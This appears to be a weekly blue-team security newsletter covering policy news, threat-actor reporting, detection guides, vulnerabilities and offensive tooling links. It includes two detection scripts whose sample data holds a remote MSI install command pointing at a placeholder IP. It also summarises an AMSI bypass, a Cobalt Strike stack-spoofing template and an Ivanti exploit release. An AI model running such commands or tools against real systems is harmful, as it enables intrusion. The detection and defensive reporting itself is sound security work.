Welcome to the weekly highlights and analysis of the blueteamsec subreddit (and my wider reading). Not everything makes it in, but the best bits do.
Operationally this week: further exploitation of zero-days in edge security appliances… At the end of the month we are planning on releasing guidance (co-sealed with a number of partners) for device manufacturers (physical and virtual) on the minimum telemetry and volatile/non-volatile forensic requirements in response..
In the high-level this week:
Passkeys: they're not perfect but they're getting better - National Cyber Security Centre publishes - “Passkeys are the future of authentication, offering enhanced security and convenience over passwords, but widespread adoption faces challenges that the NCSC is working to resolve.”
New proposals to counter ransomware: Have your say - National Cyber Security Centre publishes - “Help shape the proposals aimed at striking a significant blow to the ransomware criminal business model in the UK.”
Ransomware: proposals to increase incident reporting and reduce payments to criminals - Home Office consults
New advice helps organisations select secure operational technology products in face of rising cyber threat - National Cyber Security Centre publishes - “Guide aims to help operational technology (OT) owners and operators choose products and manufacturers that follow secure-by-design principles.”
Executive Order on Strengthening and Promoting Innovation in the Nation’s Cybersecurity - White House (not me) executively orders - including “Operationalizing Transparency and Security in Third-Party Software Supply Chains”
Bolstering the cybersecurity of the healthcare sector - European Union publishes - “The Commission has presented an EU Action Plan to strengthen the cybersecurity of hospitals and healthcare providers. This initiative is a key priority within the first 100 days of the new mandate, aiming to create a safer and more secure environment for patients.”
FTC Takes Action Against GoDaddy for Alleged Lax Data Security for Its Website Hosting Services - US Federal Trade Commission announces - “Proposed order will prohibit GoDaddy from misleading customers about its security protections and require it to establish a robust information security program”
Fired Disney employee will plead guilty to hacking menus to hide peanut content - CNBC reports - “A former Disney employee agreed to plead guilty in a federal criminal case where he is accused of hacking into menu-creation software for the company’s restaurants, to falsely indicate that certain food items did not contain potentially deadly allergens such as peanuts”
Regulation (EU) 2025/38 of the European Parliament and of the Council of 19 December 2024 - European Union publishes - “laying down measures to strengthen solidarity and capacities in the Union to detect, prepare for and respond to cyber threats and incidents and amending Regulation (EU) 2021/694 (Cyber Solidarity Act)”
Cybersecurity: Cybersecurity and Cyber Solidarity Act published in Official Journal - Practical Law publishes - “On 15 January 2025, Regulation (EU) 2025/37 of the European Parliament and of the Council of 19 December 2024 amending Regulation (EU) 2019/881 (Cybersecurity Act) as regards managed security services and Regulation (EU) 2025/38 of the European Parliament and of the Council of 19 December 2024 laying down measures to strengthen solidarity and capacities in the Union to detect, prepare for and respond to cyber threats and incidents and amending Regulation (EU) 2021/694 (Cyber Solidarity Act) were published in the Official Journal of the European Union.”
Hackney Council still addressing 2020 data breach issues - BBC reports - “Hackney Council has bought a new housing management system - technology that supports local authorities manage housing - as it tries to address the damage from a cyber attack four years ago.”
Towards a Digital Clearinghouse 2.0 - European Data Protection Supervisor publishes - “To help promote effective enforcement in the digital world, the EDPS publishes a concept note on the future of cross-regulatory cooperation. Building on its experience with the Digital Clearinghouse (2017-2021), this publication takes stock of relevant developments in the EU regulatory sphere, such as the EU Digital Rulebook and landmark rulings of the EU Court of Justice, as well as new multilateral cooperation structures at national level. Relevant stakeholders will also be involved in the discussion.”
'Tour Guides' Arrested in Bangkok's Sophisticated SMS Scam - Khaosod English reports - “The Cyber Police Task Force has apprehended two Chinese nationals who masqueraded as tour guides while operating a sophisticated mobile scam operation targeting thousands of shoppers across Bangkok’s busiest commercial areas....” … “The operation utilized false base station technology to transmit fraudulent SMS messages containing phishing links to nearby mobile devices....”
Cybersecurity Performance Goals Adoption Report - CISA publishes - “Exploitable services routinely monitored by CISA Vulnerability Scanning have been steadily decreasing from 12 services per enrollee in August 2022 to about eight services per enrollee in August 2024”
Product Security Bad Practices - CISA updates - “Three new bad practices on use of known insecure or outdated cryptographic functions, hardcoded credentials, and product support periods.”
Reporting on/from China
Biden administration looks to penalize Salt Typhoon telecom hackers - Washington Post reports - “The administration could decide as early as Monday to designate the firm, whose name has not been released publicly, said the officials. The decision is not yet final, they cautioned.”
Treasury Sanctions Company Associated with Salt Typhoon and Hacker Associated with Treasury Compromise - US Department of Treasury announces
Chinese hackers accessed thousands of Treasury files, including Yellen’s, officials told lawmakers - Politico reports - “Treasury and other law enforcement officials told lawmakers Wednesday that Chinese hackers gained access to more than 3,000 unclassified agency files as part of a cybersecurity breach last year”
Multilateral cooperation in building critical infrastructure security and resilience: case of American deterrence of Chinese cyberthreats - University of Oxford researches - “By examining China’s growing cyber capacity and the implications of advanced technologies on security using publicly available materials, the paper suggests that making use of every actor's capability and capacity is crucial to developing a more solid and advanced collective cyber defence system.”
University of Michigan to end partnership with a Chinese university over national security concerns - Associated Press reports - “Ono said the university, while valuing academic international partnerships, takes “matters of national security very seriously” and will better vet visa requirements for international students.”
Overview of the Global Defense Cyberspace Situation in 2024 - Qian Internet Intelligence Bureau analyses - “The United States, the United Kingdom, Canada, Australia, Japan, South Korea and other countries, as well as the European Union, have issued cybersecurity strategies, decrees and administrative orders to improve the network security policy and regulatory system, set a proactive defense tone, strengthen work guidance and overall coordination, and emphasize the fight against cyber security”
Shanghai and Beijing unveil plans to boost brain computer interface industry - South China Morning Post reports - “Shanghai is seeking to achieve self-sufficiency in the core sectors of the industry chain and position itself as a “global innovation hub for BCI [brain computer interface] products” in five years’ time, according to a detailed plan for 2025-30 released by the city government on Friday.”
AI
Spy vs. AI - Anne Neuberger forecasts - “AI’s potential to revolutionize the intelligence community lies in its ability to process and analyze vast amounts of data at unprecedented speeds.”
AI Cybersecurity Collaboration Playbook - CISA publishes - “Guide JCDC partners on how to voluntarily share information related to cybersecurity incidents and vulnerabilities associated with AI systems.”
Cyber proliferation
Arria-formula Meeting on “Commercial Spyware and the Maintenance of International Peace and Security” - Security Council Report publishes - “This afternoon (14 January), the US will convene an Arria-formula meeting on the implications of the proliferation and misuse of commercial spyware for the maintenance of international peace and security. The meeting is being co-sponsored by Council members France, the Republic of Korea (ROK), and the UK, together with Australia, Austria, Canada, Estonia, Finland, Japan, Latvia, Lithuania, the Netherlands, Norway, Poland, and Sweden. Briefings are expected from John Scott-Railton, senior researcher at the Citizen Lab at the University of Toronto, which investigates digital espionage targeting civil society, among other issues”
Nearly 100 countries have acquired cellphone spyware ‘and they’re using it’: Official - Breaking Defense reports - “Casey’s estimation that nearly 100 countries have purchased some form of cellphone spyware suggests the market has grown a bit since April 2023 when Britain’s National Cyber Security Centre (another NCSC) said more than 80 capitals had acquired the tech.”
Bounty Hunting
Treasury Sanctions Company Associated with Salt Typhoon and Hacker Associated with Treasury Compromise - US Department of Treasury announces - “Today, the Department of the Treasury’s Office of Foreign Assets Control (OFAC) is sanctioning Yin Kecheng, a Shanghai-based cyber actor who was involved with the recent Department of the Treasury network compromise.”
Operators of Cryptocurrency Mixers Charged with Money Laundering - US Department of Justice announces - “According to the indictment, the defendants operated cryptocurrency ‘mixers’ that served as safe havens for laundering criminally derived funds, including the proceeds of ransomware and wire fraud,”
Security through transparency: RP2350 Hacking Challenge results are in - Raspberry Pi act in an exemplary manner regarding market transparency - “All vendors have security vulnerabilities in their chips. We are unusual because we talk about them, and aim to fix them, rather than brushing them under the carpet. Security through transparency is here to stay.”
DORA implementation brings EU cyber insurance market into focus - Cyber Risk Insurer talks up - “Increased requirements around the management of information and communication technology (ICT) risks under the Digital Operational Resilience Act, which took effect in the EU today, may lead to an increase in cyber insurance take-up for in-scope organisations.”
Reflections this week build on the publication ‘It's Not Paranoia If They're Really After You’: When Announcing Deception Technology Can Change Attacker Decisions. It shows that knowing deception technology is present changes threat actor behaviour…
… given this, organisations might want to consider how deception forms part of their cyber defence/resilience strategy, both in the psychological game as well as the operational...
All attribution is by others and not the UK Government unless specifically stated as such, please see the legal text at the end.
Have a lovely Saturday…
Ollie
Cyber threat intelligence
Who is doing what to whom and how allegedly.
Reporting on Russia
New Star Blizzard spear-phishing campaign targets WhatsApp accounts
Microsoft Threat Intelligence detail an alleged Russian campaign which shows some interesting victimology..
In mid-November 2024, Microsoft Threat Intelligence observed the Russian threat actor we track as Star Blizzard sending their typical targets spear-phishing messages, this time offering the supposed opportunity to join a WhatsApp group. This is the first time we have identified a shift in Star Blizzard’s longstanding tactics, techniques, and procedures (TTPs) to leverage a new access vector. Star Blizzard’s targets are most commonly related to government or diplomacy (both incumbent and former position holders), defense policy or international relations researchers whose work touches on Russia, and sources of assistance to Ukraine related to the war with Russia.
Double-Tap Campaign: Russia-nexus APT possibly related to APT28 conducts cyber espionage on Central Asia and Kazakhstan diplomatic relations
Amaury G., Maxime A., Erwan Chevalier and Felix Aimé outline an alleged Russian campaign which again shows some interesting victimology but also laziness in operational security..
Our investigation led us to find 18 DOCX files with embedded macros, including seven blank documents that are part of the same infection chain. Almost all documents likely originally belong to the Ministry of Foreign Affairs of the Republic of Kazakhstan, either as correspondence letters, draft documents, or internal administrative notes. They are dated from 2021 to October 2024 (based on both internal dates and metadata).
..
Other documents are administrative reports or briefings regarding official meetings between Kazakhstan officials and foreign stakeholders, such as the state visit from Kazakhstan president Tokaiev in Mongolia in October 2024 or his meeting with executives of US companies in New York during the 78th session of the UN General Assembly in September 2024.
..
We assess it is possible that this campaign was conducted by a Russia-nexus intrusion set, UAC-0063, sharing overlaps with APT28.
Reporting on China
Justice Department and FBI Conduct International Operation to Delete Malware Used by China-Backed Hackers
US Department of Justice announces a removal operation in which they attribute a previous campaign to China. This was achieved using the sinkhole that Sekoia initially set up, showing the value of public/private partnerships, i.e. the public side gets legal authorisation to conduct the invasive operation.
The Justice Department and FBI today announced a multi-month law enforcement operation that, alongside international partners, deleted “PlugX” malware from thousands of infected computers worldwide. As described in court documents unsealed in the Eastern District of Pennsylvania, a group of hackers sponsored by the People’s Republic of China (PRC), known to the private sector as “Mustang Panda” and “Twill Typhoon,” used a version of PlugX malware to infect, control, and steal information from victim computers.
According to court documents, the PRC government paid the Mustang Panda group to, among other computer intrusion services, develop this specific version of PlugX. Since at least 2014, Mustang Panda hackers then infiltrated thousands of computer systems in campaigns targeting U.S. victims, as well as European and Asian governments and businesses, and Chinese dissident groups.
Reporting on North Korea
Joint Statement of ROK-US-Japan on North Korean Cryptocurrency Theft and Public-Private Cooperation
The Republic of Korea, the United States, and Japan issue a joint statement on alleged North Korean crypto asset campaigns. It highlights the threat to the sector and is a reminder of why there should be no complacency.
North Korea-linked Advanced Persistent Threat (APT) groups, including the Lazarus Group, which has been sanctioned by the relevant authorities of the three countries, continue to demonstrate a pattern of malicious behavior in cyberspace by conducting numerous cybercrime activities to steal cryptocurrencies and target exchanges, virtual asset custodians, and individual users. In 2024 alone, the governments of the three countries have individually and jointly attributed multiple cryptocurrency thefts to North Korea: $308 million from DMM Bitcoin, $50 million from Upbit, and $16.13 million from Rain Management (in USD equivalent). In addition, based on detailed industry analysis, South Korea and the United States have additionally attributed $235 million from WazirX and $50 million from Radiant Capital to North Korea in 2024.
Beware of LinkedIn contacts who are after your organization’s assets, not yours
Shusei Tomonaga of JPCert highlights the social engineering tradecraft (previously covered) by an alleged North Korean threat actor.
National Police Agency: Cyber attacks targeting cryptocurrency-related businesses by TraderTraitor, a cyber attack group backed by North Korea
https://www.npa.go.jp/bureau/cyber/pdf/020241224_pa.pdf (PDF)
Attacks that exploit LinkedIn are mainly used by the attack group Lazarus, and JPCERT/CC has been continuously observing attacks exploiting LinkedIn against domestic organizations since around 2019. Lessons learned from past incidents show that using LinkedIn on a host used for business purposes is extremely dangerous and should be avoided unless there is a special reason. In order to reduce such damage, please consider taking measures such as restricting the use of SNS on business terminals (installation of SNS apps, access control, etc.). If you allow the use of SNS on hosts used for business purposes, we recommend creating rules and considering measures to prevent damage even if an attacker contacts you.
Reporting on Iran
Iranian Cyber Units Organizational Structure
Nariman Gharib provides a breakdown of the alleged structure..
https://cyberunits.iranianthreatactors.com/
Reporting on Other Actors
The great Google Ads heist: criminals ransack advertiser accounts via fake Google ads
Jérôme Segura does what he does best with this analysis. It highlights that the ad ecosystem is a hard place in which to provide integrity, even if you are a big technology firm..
This is the most egregious malvertising operation we have ever tracked, getting to the core of Google’s business and likely affecting thousands of their customers worldwide. We have been reporting new incidents around the clock and yet keep identifying new ones, even at the time of publication.
The following diagram illustrates at a high level the mechanism by which advertisers are getting fleeced:
8 Additional Compromised Chrome Extensions Affecting 1.1 Million Users
William Tran details further elements of this campaign. More interesting to me is that it shows how the intelligence picture evolves over time, especially if reporting happens early. Also note the length of time some of the extensions were compromised.
No Spin.AI customers affected by phishing attempt: We reviewed the OAuth ID used in the phishing attempt and found no evidence of our customers falling victim to this phishing attempt.
8 compromised extensions not previously reported: We processed our database using the IOCs and found the sclpfybn[.]com domain in 8 extensions that were not previously reported. These 8 extensions were used by 1.1 million users during the time of compromise.
Signs of this attack campaign starting in 2023: Thanks to our database, which maintains a history of all browser extensions, we found that the earliest the sclpfybn[.]com domain was detected was in September 2023. While many browser extensions were either quickly patched or removed from the Chrome Web Store, some browser extensions were compromised for over 300 days before receiving a patch.
One extension was compromised earlier than initially reported: One extension (AI Shop Buddy/Amazon Search; epikoohpebngmakjinphfiagogjcnddm) was previously reported to be compromised in v2.7.3. Our database indicates the compromise really began in v2.7.0.
https://spin.ai/blog/cyberhaven-attack-puts-more-users-at-risk/
Banshee: The Stealer That “Stole Code” From MacOS XProtect
Antonis Terefos shows how some malware writers are inspired by their reverse engineering..
One method of distributing Banshee Stealer involved malicious GitHub repositories, targeting Windows users with Lumma Stealer and macOS users with Banshee Stealer.
Banshee operated as a ‘stealer-as-a-service’, priced at $3,000, and was advertised through Telegram and forums such as XSS and Exploit. On November 23, 2024, the malware’s source code was leaked, leading the author to shut down the operations the following day.
Despite shutting down the operation, threat actors continue to distribute the new version of Banshee via phishing websites.
https://research.checkpoint.com/2025/banshee-macos-stealer-that-stole-code-from-macos-xprotect/
Discovery
How we find and understand the latent compromises within our environments.
The Dual-Edged Sword: RMM-Ransomware Conundrum and Enhancing Security Through Threat Hunting
Israeli National Cyber Directorate publishes this guide which should inspire detection engineers. The use of Remote Monitoring and Management tooling by adversaries is pervasive..
The use of RMM tools for cyberattacks represents a specific instance of the "Living Off the Land" (LOTL) approach in cybersecurity. This approach involves leveraging legitimate tools and functionalities already present within the target system to execute malicious operations, often evading detection and bypassing traditional security measures.
..
This article offers an overview of the phenomenon and outlines effective threat-hunting strategies for identifying and addressing such activities within the network.
https://www.gov.il/BlobFolder/reports/alert_1849/he/ALERT-CERT-IL-W-1849.pdf
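As an added illustration of the kind of RMM-as-LOTL hunt the INCD guide describes (example code written for this newsletter, not from the guide), the script below runs four checks over constructed process-creation events in a Sysmon Event ID 1 shape: RMM products not on the approved list, RMM binaries launched from user-writable paths, remote MSI installs via msiexec, and more than one RMM product on a single host. The approved-tool list, the image-name patterns and the sample events are assumptions.

```python
"""Hunt for Remote Monitoring and Management (RMM) tools used as
living-off-the-land tooling, run over process-creation events.
Events are constructed for this example (Sysmon Event ID 1 shape)."""
import re
from collections import defaultdict

# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "corp\\alice",
     "image": r"C:\Program Files\TeamViewer\TeamViewer.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "TeamViewer.exe"},
    {"host": "WS02", "user": "corp\\bob",
     "image": r"C:\Users\bob\Downloads\AnyDesk.exe",
     "parent": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "cmdline": "AnyDesk.exe --silent"},
    {"host": "WS02", "user": "corp\\bob",
     "image": r"C:\Users\bob\AppData\Local\Temp\ScreenConnect.ClientSetup.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "ScreenConnect.ClientSetup.exe /silent"},
    {"host": "SRV03", "user": "NT AUTHORITY\\SYSTEM",
     "image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "msiexec.exe /i http://203.0.113.9/agent.msi /qn"},
    {"host": "WS01", "user": "corp\\alice",
     "image": r"C:\Windows\System32\notepad.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "notepad.exe"},
]

# Assumed: the only RMM product this organisation has sanctioned.
APPROVED_RMM = {"TeamViewer"}

# Real product names; the image-name patterns are assumptions for the example.
RMM_SIGNATURES = {
    "TeamViewer": r"teamviewer.*\.exe$",
    "AnyDesk": r"anydesk.*\.exe$",
    "ScreenConnect": r"screenconnect.*\.exe$",
    "Atera": r"ateraagent.*\.exe$",
    "Splashtop": r"splashtop.*\.exe$",
}

# Locations a standard user can write to; a sanctioned install lives in Program Files.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(Downloads|AppData)\\|\\Windows\\Temp\\", re.I)

# msiexec pulling a package straight from a URL, a common silent RMM deployment.
REMOTE_MSI = re.compile(r"msiexec(\.exe)?\b.*\s/i\s+https?://", re.I)


def classify_rmm(image_path):
    """Return the RMM product name for an image path, or None if not RMM."""
    name = image_path.rsplit("\\", 1)[-1].lower()
    for product, pattern in RMM_SIGNATURES.items():
        if re.search(pattern, name):
            return product
    return None


def hunt_rmm(events):
    """Return a list of findings ({rule, host, detail}) over the events."""
    findings = []
    products_per_host = defaultdict(set)
    for e in events:
        product = classify_rmm(e["image"])
        if product:
            products_per_host[e["host"]].add(product)
            if product not in APPROVED_RMM:
                findings.append({"rule": "unapproved_rmm",
                                 "host": e["host"], "detail": product})
            if USER_WRITABLE.search(e["image"]):
                findings.append({"rule": "rmm_from_user_writable_path",
                                 "host": e["host"], "detail": e["image"]})
        if REMOTE_MSI.search(e["cmdline"]):
            findings.append({"rule": "remote_msi_install",
                             "host": e["host"], "detail": e["cmdline"]})
    # Two different RMM products on one host is a strong signal of an
    # operator bringing their own tool alongside the sanctioned one.
    for host, products in products_per_host.items():
        if len(products) > 1:
            findings.append({"rule": "multiple_rmm_on_host", "host": host,
                             "detail": ",".join(sorted(products))})
    return findings


if __name__ == "__main__":
    for finding in hunt_rmm(SAMPLE_EVENTS):
        print(finding)
```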
Detonating Beacons to Illuminate Detection Gaps
Mika Ayenson, PhD, Miguel Garzon and Samir Bousseaden show how to industrialize / scale detection engineering with this approach. A 😙🤌 to things which scale..
We used automation for the tedious behind-the-scenes work because ON week is about the more interesting research findings, but we wanted to share some of the challenges and pain points of this kind of technology in case you're interested in building your own detonation framework. If you’re interested in following along in general, we’ll walk through some of the nuances and pain points.
https://www.elastic.co/security-labs/detonating-beacons-to-illuminate-detection-gaps
Template for Defender XDR/Sentinel
Bert-Jan Pals brings order to the force with this template. Just need adoption now..
https://github.com/Bert-JanP/Hunting-Queries-Detection-Rules/blob/main/DetectionTemplate.md
Defence
How we proactively defend our environments.
Microsoft Expanded Cloud Logs Implementation Playbook
From our friends at CISA..
This playbook provides a detailed overview of the newly introduced logging capabilities in Microsoft Purview Audit (Standard). These capabilities enable organizations to conduct forensic and compliance investigations by accessing critical events, such as
Mail items accessed,
Mail items sent, and
User searches in SharePoint Online and Exchange Online.
These capabilities also allow organizations to monitor and analyze thousands of user and admin operations performed in dozens of Microsoft services and solutions. In addition, these capabilities include administration/enabling actions and ingestion of these logs to Microsoft Sentinel and Splunk Security Information and Event Management (SIEM) systems.
https://www.cisa.gov/resources-tools/resources/microsoft-expanded-cloud-logs-implementation-playbook
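To show what the three event types called out above look like when hunted, here is an added example (written for this newsletter, not from the CISA playbook) that runs over constructed Purview Audit records in a simplified AuditData JSON-per-line shape and flags untrusted mailbox sync, sensitive searches from untrusted IPs, and a send shortly after such a search. The trusted network range, the sensitive-term watch-list and the sample records are assumptions; the operation names MailItemsAccessed, Send, SearchQueryInitiatedExchange and SearchQueryInitiatedSharePoint are the real Purview operations.

```python
"""Hunt over Microsoft Purview Audit records for MailItemsAccessed, Send and
SearchQueryInitiated* events. Input is JSON-per-line AuditData (simplified
shape; records below are constructed for the example, not tenant data)."""
import ipaddress
import json
from collections import defaultdict
from datetime import datetime

SAMPLE_AUDIT_JSONL = """\
{"CreationTime":"2025-01-15T08:02:11","Operation":"MailItemsAccessed","UserId":"alice@example.test","ClientIPAddress":"10.20.30.40","ClientInfoString":"Client=OWA;","OperationProperties":[{"Name":"MailAccessType","Value":"Bind"},{"Name":"IsThrottled","Value":"False"}]}
{"CreationTime":"2025-01-15T08:05:47","Operation":"MailItemsAccessed","UserId":"alice@example.test","ClientIPAddress":"203.0.113.77","ClientInfoString":"Client=REST;;","OperationProperties":[{"Name":"MailAccessType","Value":"Sync"},{"Name":"IsThrottled","Value":"False"}]}
{"CreationTime":"2025-01-15T08:06:02","Operation":"SearchQueryInitiatedExchange","UserId":"alice@example.test","ClientIPAddress":"203.0.113.77","QueryText":"wire transfer invoice"}
{"CreationTime":"2025-01-15T08:09:30","Operation":"Send","UserId":"alice@example.test","ClientIPAddress":"203.0.113.77","Item":{"Subject":"Re: invoice payment details"}}
{"CreationTime":"2025-01-15T09:00:00","Operation":"SearchQueryInitiatedSharePoint","UserId":"bob@example.test","ClientIPAddress":"10.20.30.41","QueryText":"quarterly report"}
"""

TRUSTED_NETWORKS = [ipaddress.ip_network("10.0.0.0/8")]  # assumed corporate range
SENSITIVE_TERMS = ("invoice", "wire", "password", "payroll")  # assumed watch-list


def parse_records(jsonl_text):
    """Parse JSON-per-line AuditData records and sort them by CreationTime."""
    records = [json.loads(line) for line in jsonl_text.splitlines() if line.strip()]
    for r in records:
        r["_ts"] = datetime.fromisoformat(r["CreationTime"])
    return sorted(records, key=lambda r: r["_ts"])


def _prop(record, name):
    """Read a named entry from the OperationProperties list (MailItemsAccessed)."""
    for p in record.get("OperationProperties", []):
        if p.get("Name") == name:
            return p.get("Value")
    return None


def is_trusted(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in TRUSTED_NETWORKS)


def hunt(records, window_minutes=15):
    """Return findings: Sync-type mailbox access from an untrusted IP,
    sensitive searches from an untrusted IP, and a Send from the same
    user/IP within the window after such a search (BEC-style sequence)."""
    findings = []
    recent_search = defaultdict(list)  # (user, ip) -> sensitive-search timestamps
    for r in records:
        op, user, ip = r["Operation"], r["UserId"], r["ClientIPAddress"]
        untrusted = not is_trusted(ip)
        if op == "MailItemsAccessed" and untrusted and _prop(r, "MailAccessType") == "Sync":
            # Sync access pulls whole folders; outside corporate ranges it is
            # the shape of a mailbox being downloaded after a token/password theft.
            findings.append({"rule": "untrusted_mailbox_sync", "user": user, "ip": ip})
        elif op.startswith("SearchQueryInitiated"):
            query = r.get("QueryText", "").lower()
            if any(t in query for t in SENSITIVE_TERMS):
                recent_search[(user, ip)].append(r["_ts"])
                if untrusted:
                    findings.append({"rule": "sensitive_search_untrusted_ip",
                                     "user": user, "ip": ip, "query": r["QueryText"]})
        elif op == "Send" and untrusted:
            searches = recent_search.get((user, ip), [])
            if any((r["_ts"] - ts).total_seconds() <= window_minutes * 60 for ts in searches):
                findings.append({"rule": "send_after_sensitive_search", "user": user,
                                 "ip": ip, "subject": r.get("Item", {}).get("Subject")})
    return findings


if __name__ == "__main__":
    for finding in hunt(parse_records(SAMPLE_AUDIT_JSONL)):
        print(finding)
```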
How to use Temporary Access Pass (TAP) with internal guest users
Dishan Francis shows how to leverage this feature to further reduce the authentication attack surface.
A Temporary Access Pass (TAP) is a time-limited passcode that can be configured for single use or multiple sign-ins.
Organisations not only have internal users to manage but also guest users. Until now, the TAP method was only available for internal users, and guest users were not permitted to use this method. This makes sense because if guest users also need to use passwordless authentication, it should occur in their home tenant.
But now Entra ID supports TAP for “Internal Guest” users.
Privacy-Preserving Authentication: Theory vs. Practice
Daniel Slamanig provides an academic review of an interesting area, especially in a world where there is less trust.
It needs to be concluded, that currently enrolled (and partly also planned) identity solutions typically provide rather weak privacy protection and are quite far from what could be considered the ideal case.
Recent progress in cryptographic research and in particular in the field of zk-SNARKs, however, does now even enable solutions based on existing “legacy cryptography” and so even immediate large-scale deployments do not seem out of reach.
https://arxiv.org/pdf/2501.07209
Compiling C to Safe Rust, Formalized
Aymeric Fromherz and Jonathan Protzenko show that when constrained C is used, porting to memory-safe languages in a semi-automated manner is practical.
We apply our methodology to existing formally verified C codebases: the HACL* cryptographic library, and binary parsers and serializers from EverParse, and show that the subset of C we support is sufficient to translate both applications to safe Rust. Our evaluation shows that for the few places that do violate Rust's aliasing discipline, automated, surgical rewrites suffice; and that the few strategic copies we insert have a negligible performance impact. Of particular note, the application of our approach to HACL* results in an 80,000-line verified cryptographic library, written in pure Rust, that implements all modern algorithms - the first of its kind.
https://arxiv.org/abs/2412.15042
Incident Writeups & Disclosures
How they got in and what they did.
Unacast Security Incident Notification
This is from the Gravy Analytics breach hinting at what went down.
On January 4, 2025, Gravy Analytics, a subsidiary of Unacast, Inc, identified unauthorized access to its AWS cloud storage environment. The unauthorized person obtained some files, but the contents of those files and whether they contain personal data remains under investigation. Gravy Analytics is informing Datatilsynet at this time for your awareness, as speculation about this incident has started to appear on social media and in news media.
Vulnerability
Our attack surface.
CVE-2024-8474: OpenVPN Connect Android application exposure of private key in application debug logs
An oof here..
A security vulnerability exists in the OpenVPN Connect Android application prior to version 3.5.0. The application's configuration profile may log the private key in clear text when being debugged with Android Debug Bridge (ADB) tools. An unauthorized actor accessing the device's logs could potentially use this private key to decrypt VPN traffic, posing a security risk.
However, several significant factors limit exploitability and mitigate the vulnerability's real-world impact. Specifically, physical access to the device, use of developer mode and USB debugging, and real-time log access before an attacker can retrieve the private key from the logs.
https://openvpn.net/security-advisory/openvpn-connect-android-private-key-exposure/
Under the cloak of UEFI Secure Boot: Introducing CVE-2024-7344
Martin Smolár shows that the UEFI chain-of-trust attack surface rabbit hole is indeed deep. Interesting that so many vendors could have fallen foul..
Exploitation of this vulnerability leads to the execution of untrusted code during system boot, enabling potential attackers to easily deploy malicious UEFI bootkits (such as Bootkitty or BlackLotus) even on systems with UEFI Secure Boot enabled, regardless of the installed operating system.
The affected UEFI application is part of several real-time system recovery software suites developed by Howyar Technologies Inc., Greenware Technologies, Radix Technologies Ltd., SANFONG Inc., Wasay Software Technology Inc., Computer Education System Inc., and Signal Computer GmbH. Following is the list of vulnerable software products:
Howyar SysReturn before version 10.2.023_20240919
Greenware GreenGuard before version 10.2.023-20240927
Radix SmartRecovery before version 11.2.023-20240927
Sanfong EZ-back System before version 10.3.024-20241127
WASAY eRecoveryRX before version 8.4.022-20241127
CES NeoImpact before version 10.1.024-20241127
SignalComputer HDD King before version 10.3.021-20241127
The vulnerability is caused by the use of a custom PE loader instead of using the standard and secure UEFI functions LoadImage and StartImage.
Offense
Attack capability, techniques and trade-craft.
Being a good CLR host – Modernizing offensive .NET tradecraft
Joshua Magri shows where detection engineers might go to find some gold..
Operators can take control over many aspects of the CLR using “CLR customizations” when executing .NET assemblies in memory
Taking over memory management for the CLR enables operators to control and track all allocations made by the CLR, and also provides an easy way to keep track of assemblies being loaded into the process
Implementing a custom assembly loading manager enables a novel AMSI bypass using only “intended” functionality, with no byte patches or process hacking required
https://securityintelligence.com/x-force/being-a-good-clr-host-modernizing-offensive-net-tradecraft/
Detected "zero-day behavior" in PDF samples
Haifei’s platform caught this behaviour which might be exploitable in some situations..
On Adobe Reader, if the PDF sample is opened directly, the application will attempt to locate a computer named "Applications".
If it finds the computer, it will try to connect to the server and send the local (net)NTLM information to it.
https://justhaifei1.blogspot.com/2025/01/expmon-detected-zero-day-behavior-in.html
CF-Hero
Musana releases this tooling which will peel back the security defences for some.
CF-Hero is a reconnaissance tool that uses multiple data sources to discover the origin IP addresses of Cloudflare-protected web applications
https://github.com/musana/CF-Hero
Draugr Template
NtDallas releases this refinement to a Cobalt Strike BOF which is worth exploring in terms of detection tradecraft.
CobaltStrike BOF Template to easily perform a synthetic stack frame in BOF.
The spoofer is based on LoudSunRun.
For each API call, a gadget is randomly used inside KERNELBASE.DLL.
https://github.com/NtDallas/Draugr
Intune Attack Paths — Part 1
Andy Robbins takes a romp through Intune attack paths; defence teams should take a read and ensure they have coverage / mitigations..
https://posts.specterops.io/intune-attack-paths-part-1-4ad1882c1811
Exploitation
What is being exploited..
CVE-2024-55591: Authentication bypass in Node.js websocket module
Exploited in the wild..
An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] affecting FortiOS and FortiProxy may allow a remote attacker to gain super-admin privileges via crafted requests to Node.js websocket module.
Please note that reports show this is being exploited in the wild.
https://www.fortiguard.com/psirt/FG-IR-24-535
CVE-2025-0282: Ivanti Connect Secure IFT TLS Stack Overflow pre-auth RCE
Sina Kheirkhah walks through the vulnerability and then releases an exploit…
Start by running the code in "Normal" mode. If you encounter a password prompt, it indicates the target is functional. Next, switch to "Exploit" mode. If you see the message "Failed to complete authentication," the target might be vulnerable. Note that the exploit code includes hardcoded addresses and offsets, which you'll need to modify to work with your approved target.
https://github.com/watchtowrlabs/CVE-2025-0282
Tooling and Techniques
Low level tooling and techniques for attack and defence researchers…
Dyana
Simone Margaritelli releases a sandbox which again provides scale to those dealing with various threats..
Dyana is a sandbox environment using Docker and Tracee for loading, running and profiling a wide range of files, including machine learning models, ELF executables, Pickle serialized files, Javascripts and more. It provides detailed insights into GPU memory usage, filesystem interactions, network requests, and security related events.
https://github.com/dreadnode/dyana
LabSync
Tomer Harpaz releases a collaboration work aid for those who don’t use Ghidra (or Binary Ninja)..
LabSync is an IDA plugin that can be used to partially synchronize IDBs between different users working on reversing the same binaries.
LabSync is intended to be non-intrusive, lightweight, and easy to use for very frequent syncs (think as frequently and easily as you saved your IDB before Undo was a thing).
The leading use case is multiple people reversing the same binary at the same time, and especially for binaries that don't start from a good "baseline" IDB (i.e. no typing information, non-standard formats or architectures), and whose structure keeps changing during the reversing process.
https://github.com/cellebrite-labs/LabSync
Footnotes
Some other small (and not so small) bits and bobs which might be of interest.
Aggregate reporting
Global Cybersecurity Outlook 2025 - World Economic Forum
Study: Development status of quantum computers version 2.1 - German BSI
Regulating dark patterns in the EU: Towards digital fairness
Artificial intelligence
Books
Nothing this week
Events
USENIX Security '25 Enigma Track Call for Participation - August 13th - 15th, 2025
